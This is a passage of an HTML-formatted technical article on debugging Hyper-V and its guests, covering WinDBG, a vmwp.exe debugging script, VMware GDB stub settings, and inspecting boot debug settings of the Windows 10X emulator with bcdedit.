text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!pte2va</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">!ptov <cr3</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">></span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.45pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: justify; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">dx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> extenstion is available too, but with some limitation (because of no symbols):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">@$debuggerRootNamespace.Debugger.State.PseudoRegisters.General. </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Exentry</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> pseudo-register shows hvix64.exe entry point.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 53.45pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 29px; overflow: hidden; width: 299px;"><img height="29" src="https://lh4.googleusercontent.com/7fosR3YyT__Y_VhPknDzyiWpa153zafAqw6pH_hdzWuUFe-iXqdtj2WWf9_M4-JhzyH_vgNF9VB4V2L8y9SiqXevwBgxLphYo5_n2odJlVPP_wW7Gj2AKO6CtBIpsf9xq_ENsM3Bx4ZIceOHoQ" style="margin-left: 0px; margin-top: 0px;" width="299" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging using embedded vmwp.exe capabilities</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Debugging guest Hyper-V VM can be made using debugging capabilities of the worker management process (vmwp.exe), which was mentioned by Jake Oshins on OSR Online (</span><a href="https://community.osr.com/discussion/234398" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://community.osr.com/discussion/234398</span></a><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and Rafael Rivera (@WithinRafael) in his blog:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><a href="https://withinrafael.com/2015/02/01/how-to-set-up-synthetic-kernel-debugging-for-hyper-v-virtual-machines" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://withinrafael.com/2015/02/01/how-to-set-up-synthetic-kernel-debugging-for-hyper-v-virtual-machines</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">I updated Jake Oshins’s script and uploaded it to github.com:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><a href="https://github.com/gerhart01/Hyper-V-scripts/blob/master/hyperv-dbg-2019.ps1" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://github.com/gerhart01/Hyper-V-scripts/blob/master/hyperv-dbg-2019.ps1</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10 and Windows Server 2019 doesn’t need additional files for it working. Script can configure guest VM, using </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">powershell direct</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> feature.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> shutdown guest OS.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">2.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> set parameters for hyperv-dbg-2019.ps1 script</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 28.35pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 50px; overflow: hidden; width: 471px;"><img height="50" src="https://lh5.googleusercontent.com/oiIBgbXectTEPnhWVPEvifG3IkUQlLYRF0BCR7px9LkWAE0W8FrR4wFtwVjmJ1V-aohqsDiGv4yzvI53d14WsfmDeQl_NTaGD5LiN96GDvOnmNNPyV8xXsOSXI-NgO8drWuTl99lPNFmvsmvWg" style="margin-left: 0px; margin-top: 0px;" width="471" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">3.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> run the script (run through the „Run as Administrator“, or disable UAC, run gpedit.msc and set Computer configuration \ Windows Settings \ Security Settings \ Local Policies \ Security Options \ User Account Control: Run All administrators in Admin Approval Mode to Disable) in the root-section</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> start WinDBG: </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WinDBG -k net:port=50010,target=127.0.0.1,key=1.2.3.4</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 28.35pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> execute the command </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">break (Ctrl+break), </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">then the debugger will stop inside the guest OS. You can inspect VM, using standard WinDBG commands, but intensive debugging may cause hangs of guest VM. </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.4.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging using VMware GDB stub</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">VMware Workstation supports embedded GDB debugger. For enable it add next lines in vmx-file of VM:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.listen.guest64 = "TRUE"</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.listen.guest64.remote = "TRUE" – for remote debugging</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">debugStub.hideBreakpoints = "TRUE"</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 70.8pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">monitor.debugOnStartGuest64 = "TRUE" – stop on BIOS loading</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Then you can attach IDA PRO, Ghidra or radare2 to GDB stub.</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">See GDB debugging example in part 3 of article (debugging hypervisor).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; padding: 0pt 0pt 0pt 18pt; text-align: center; text-indent: -18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2.5.</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Debugging Windows 10X emulator</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Windows 10X emulator is Hyper-V based. Emulator OS is running as Hyper-V VM, Windows 10X – is nested VM.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Alex Ionescu (@aionescu) and @WithinRafael showed interesting methods for getting debugging settings:</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><a href="https://twitter.com/aionescu/status/1237639135088611329" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://twitter.com/aionescu/status/1237639135088611329</span></a></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><a href="https://twitter.com/WithinRafael/status/1237813722803924992" style="text-decoration: none;"><span face="Calibri,sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #0563c1; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline;">https://twitter.com/WithinRafael/status/1237813722803924992</span></a></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can mount </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">flash.vhdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (2 clicks on file) from emulator, which is placed in </span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">C:\ProgramFiles\WindowsApps\Microsoft.Windows10XEmulatorImage10.0.19578.0Previ_1.0.1.0_x64__8wekyb3d8bbwe\Content (copy it in another place, if you get some errors with access rights). Name of catalog can contains another build number in future.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Before mount:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 94px; overflow: hidden; width: 549px;"><img height="94" src="https://lh6.googleusercontent.com/ZU7cxH-ZLdWczo-YYwHu06B0ZJ1BwNEtAH9GkZBj1azURXL7OG888pg0oS5RdRlEsdrqWvgw2boHTLIue5r0I5lnpnIwn6S4zHI9w3Pa0bJO5MNPFje9Gb1zFcATS5PnizlhThkjX7f-u4Sykg" style="margin-left: 0px; margin-top: 0px;" width="549" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify; text-indent: 17.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After mount:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 168px; overflow: hidden; width: 477px;"><img height="168" src="https://lh4.googleusercontent.com/1GxjXaDhH60TWBBc1009JQFl8uqwO6Yg8q056upyLt6mt7Curz2azVQTCMQyuGF2BKsaxIrPc1Pn3ksYDARgw86LBAHG42R64dsUWcYvLQGpgTRUE6WVD9jCPvsPjztytX8Agm6YIuk_m7r6pw" style="margin-left: 0px; margin-top: 0px;" width="477" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">select volume with VIRT_EFIESP label:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Get-Volume | ? {$_.FileSystemLabel -eq "VIRT_EFIESP"} | Format-List</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mountvol Z: \\?\Volume{12aef83a-6cf2-4ea1-932f-b3a586a65308}\</span></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /store "Z:\efi\Microsoft\boot\BCD" /dbgsettings</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">you can get all settings of boot records of root emulator partition, using command:</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-left: 18pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bcdedit /enum all /v /store "Z:\efi\Microsoft\boot\BCD"</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 18pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We also can see testsigning on option.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" 